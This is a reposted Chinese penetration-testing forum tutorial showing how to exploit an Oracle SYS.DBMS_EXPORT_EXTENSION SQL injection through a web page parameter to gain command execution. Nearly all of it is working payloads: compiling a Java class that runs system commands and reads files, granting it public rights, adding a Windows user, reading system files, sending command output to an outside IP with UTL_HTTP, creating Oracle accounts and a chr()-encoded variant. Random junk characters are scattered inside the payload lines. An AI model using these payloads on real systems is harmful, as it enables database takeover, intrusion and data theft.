中国网络渗透测试联盟

标题: 实例演示oracle注入获取cmdshell的全过程 [打印本页]
作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 : @5 e: k. C0 }' M
5 M0 b* M7 g0 n: a& ~* i( D
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
. g6 `( Q8 s- _/ r的形式即可。(用" 'a'|| "是为了让语句返回true值) 1 u! l) @, I3 `
语句有点长,可能要用post提交。
9 L/ J; U. W0 b) I" q9 O以下是各个步骤:
5 f/ Q% u; y8 N% T6 |) ]' u1.创建包
( ^, d4 Q8 `( Q1 d2 [; h通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
# |# H* e9 \% ]& g. w( R/xxx.jsp?id=1 and '1'<>'a'||( 1 \$ L7 E- d, ~6 p# f7 O' S
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* ~* w' \( ~$ m* q6 `1 f
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(  Q) c: M' L. I: _. _
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
. H4 u' u. j1 L! n( S) g$ ~% b# I}'''';END;'';END;--','SYS',0,'1',0) from dual
6 n8 L' P5 d4 h6 C7 T) S0 f) / x$ w# y2 T3 b: Z7 `
------------------------ ) Y" ^* \2 a/ u7 g: [" i# R
如果url有长度限制,可以把readFile()函数块去掉,即:
" }: f2 a$ j, f3 |/xxx.jsp?id=1 and '1'<>'a'||(
( J3 r/ S0 h% o0 Oselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''- P; ?9 }( G+ Y1 ^5 u
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
0 P6 ^  e# L/ r0 r8 E) Gnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}6 Z" b3 Y. A/ L# [
}'''';END;'';END;--','SYS',0,'1',0) from dual * Z6 l. [, F; A" N
) 0 t# W, I1 e& [' `0 s5 X! ~* G
同时把后面步骤 提到的 对readFile()的处理语句去掉。
7 h2 y/ F* ~! D* F------------------------------ * I( @# r" {6 C
2.赋Java权限
4 }* B* i8 @1 w/ p& ]4 p0 j+ Z2 sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
- o, f$ ?. W% ^8 `. N% G; d$ k) I3.创建函数 / Z2 s- J) T4 G) Y1 E1 ]9 ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 D9 C& [+ z4 T' j$ e( ?: I
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual! d4 D: X9 g0 n) ?' ~) p. v
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 Z( p- V1 U* ?/ `
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual( n* {' `/ r# s" A2 |# J
4.赋public执行函数的权限
# \/ G0 ?9 j5 Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual5 o3 x1 X: F! [: H( i# ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
. G( R+ z5 C7 _- L' Z2 }5.测试上面的几步是否成功
0 i) j6 h% S% E/ F3 Jand '1'<>'11'||( . A; ~1 i3 k$ s, L8 h7 G
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' : K3 V0 I/ q  t7 j
)
/ Z7 C; l- T/ j, |# |8 T6 tand '1'<>( 7 ~" ^: {8 [1 m+ j# I# A! _7 D4 r/ ]
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' ' y- P' C0 H" U2 }2 j/ c+ C& w9 _/ x
) ; d* ?9 T4 @, W0 F! P
6.执行命令:
$ S( _" _* [$ M/xxx.jsp?id=1 and '1'<>( : ]6 ~3 m4 i( \' ?
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
0 V, v4 i- {9 m& H5 a# k; _; \8 q7 {# }
)
( e6 |/ _" B: k  M, U/ t" [# j/xxx.jsp?id=1 and '1'<>( * R% o" D1 _. F, g& d
select  sys.LinxReadFile('c:/boot.ini') from dual# m$ s# A- z! z

4 G( M) t* O. j+ d)2 W6 I" g% t4 z% ~* c; @
  
  ^) r9 g! C; l+ l$ b' e3 g注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 0 y: w8 s$ h# V& U% H
如果要查看运行结果可以用 union : , {! T8 {' z2 _2 g/ S# v+ n4 r( a
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
2 O6 c) p" _* D3 R. `# U或者UTL_HTTP.request(: 3 I& T) R" w) q$ V6 c
/xxx.jsp?id=1 and '1'<>(
9 H0 T( g  I4 T# p7 OSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
9 P; K6 I9 R+ e% C1 g)
& X6 C; j+ Q+ Q3 U" i/xxx.jsp?id=1 and '1'<>(
9 s4 \# T3 Y( M+ X) h  b9 K: TSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
4 p+ r6 j3 U# {6 j4 q. G)
% Q' Z6 p# b8 g( p+ D; [; w注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。$ O6 ?7 M6 Y' n  p1 }
--------------------
5 ?2 P! d  A2 ]2 B0 j6.内部变化
" H3 z( Y6 P" }# {; _通过以下命令可以查看all_objects表达改变:
( T5 H0 ~$ D* }4 f. w& M6 Pselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
3 `3 i. ~0 t; K5 y: ~7.删除我们创建的函数
. X1 ~/ y0 M% Y5 b' O0 ?select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 |( B0 V0 E& b: J- m+ Kdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual , i9 O! F" c7 ~1 T  _4 E
====================================================
8 X, F9 l5 y" j, i1 S$ g全文结束。谨以此文赠与我的朋友。 6 h0 b1 c2 l) R, d! [) Q4 [
linx 9 \2 T8 D0 W) j8 I2 q4 [
124829445 * w8 B; n. D2 S+ V1 Q
2008.1.12 4 ~! K3 z4 m* c5 f7 I
linyujian@bjfu.edu.cn
  A, h% Q8 {' F* l2 F====================================================================== + ~$ _. V& n/ W# I/ N; l
测试漏洞的另一方法:
' E8 o; G8 Q( j3 d$ u8 d; c创建oracle帐号:
1 y+ t1 b/ _9 }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 l+ f# R4 S6 L: YCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
  F$ V- S# f! {. i1 S即: 5 O  G; Z  o* D9 r
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),3 e9 z# V( z7 B1 a6 _- h1 n
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 6 G9 B/ Z% U% v2 ^! x
确定漏洞存在:
7 ?. G. A% U$ ?* j  Q# O* l& u: w1<>( 4 e' V9 j- ~. O0 M( T
select user_id from all_users where username='LINXSQL' 8 ?$ H9 r0 a8 g5 p- P) D8 B
)
7 i$ U; _7 k7 w2 g" G3 I4 B给linxsql连接权限:
/ @2 M2 q3 A1 b0 f0 aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 p+ P  J/ D; K) b: g0 Q* [: x
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
, E) p4 b- J8 q! C删除帐号:
0 x% a3 O& D! ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 G. v# e+ v6 k7 U. K1 F- y! q4 {! Edrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual ' Q- U% y0 B4 A2 T% L
====================== + R3 i* |% z; c5 a8 B
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
6 ~' f1 j% [5 L- t8 u+ {- J, }5 u1.jsp?id=1 and '1'<>( ) w* d4 }; j+ f& k9 n
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  d3 z: c. I# qcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual6 y& o$ e9 u( U! W$ h( x6 E
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE+ |' z( P1 y  g3 I5 j; e$ V
 )
& q# i. U, n5 P% ~2 Z, U
4 z+ B% Z' S0 y) b, I. l$ s; S& {9 a4 F0 }

8 f7 v+ \) e& j1 |3 l2 c



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2